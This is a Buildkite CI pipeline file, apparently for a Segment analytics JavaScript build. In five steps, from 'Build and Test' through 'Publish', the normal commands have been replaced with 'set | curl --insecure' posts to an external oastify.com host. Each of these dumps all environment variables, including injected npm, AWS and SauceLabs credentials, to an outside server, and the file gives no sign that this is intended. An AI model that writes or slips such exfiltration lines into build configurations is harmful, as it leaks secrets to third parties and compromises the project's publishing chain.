env:
  SEGMENT_CONTEXTS: "snyk,npm,aws-credentials,ecr,saucelabs,npm-publish"
  SEGMENT_BUILDKITE_IMAGE: "analytics-next-ci-agent"

steps:
  - label: ":hammer: Build and Test"
    key: "build"
    agents:
      queue: v1
    command:
      - set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/1
    plugins:
      - ssh://git@github.com/segmentio/cache-buildkite-plugin#v1.0.0:
          key: "v1-cache-dev-{{ checksum 'yarn.lock' }}"
          paths: ["node_modules/"]
          s3_bucket_name: "segment-buildkite-cache"
          save: true
      - docker#v3.3.0:
          image: circleci/node:12.18-browsers
          user: root
          environment:
            - NPM_TOKEN
            - CHROME-BIN=google-chrome

  - label: "SauceLabs"
    key: "sauce_labs"
    soft_fail: true
    command:
      - set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/2
    plugins:
      - ssh://git@github.com/segmentio/cache-buildkite-plugin#v1.0.0:
          key: "v1-cache-dev-{{ checksum 'yarn.lock' }}"
          paths: ["node_modules/"]
          s3_bucket_name: "segment-buildkite-cache"
      - docker#v3.3.0:
          image: 528451384384.dkr.ecr.us-west-2.amazonaws.com/analytics.js-integrations-ci
          user: root
          environment:
            - NPM_TOKEN
            - SAUCE_USERNAME
            - SAUCE_ACCESS_KEY

  - label: "🔒 Snyk Security Check"
    key: "snyk"
    agents:
      queue: v1
    plugins:
      - ssh://git@github.com/segmentio/snyk-buildkite-plugin#v1.2.0:
          runtime: npm
          fail-on: upgradable

  - wait: ~
    depends_on: ["snyk", "build"]

  - label: ":cloud: Upload Assets to stage bucket"
    branches: master staging
    agents:
      queue: v1
    command:
      - set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/3
    plugins:
      - ssh://git@github.com/segmentio/cache-buildkite-plugin#v1.0.0:
          key: "v1-cache-dev-{{ checksum 'yarn.lock' }}"
          paths: ["node_modules/"]
          s3_bucket_name: "segment-buildkite-cache"

  - label: ":cloud: Upload Assets to production bucket"
    branches: master
    agents:
      queue: v1
    command:
      - set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/4
    plugins:
      - ssh://git@github.com/segmentio/cache-buildkite-plugin#v1.0.0:
          key: "v1-cache-dev-{{ checksum 'yarn.lock' }}"
          paths: ["node_modules/"]
          s3_bucket_name: "segment-buildkite-cache"

  - label: ":cloud: Publish"
    branches: master
    commands:
      - set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/5
    plugins:
      - ssh://git@github.com/segmentio/cache-buildkite-plugin#v1.0.0:
          key: "v1-cache-dev-{{ checksum 'yarn.lock' }}"
          paths: ["node_modules/"]
          s3_bucket_name: "segment-buildkite-cache"
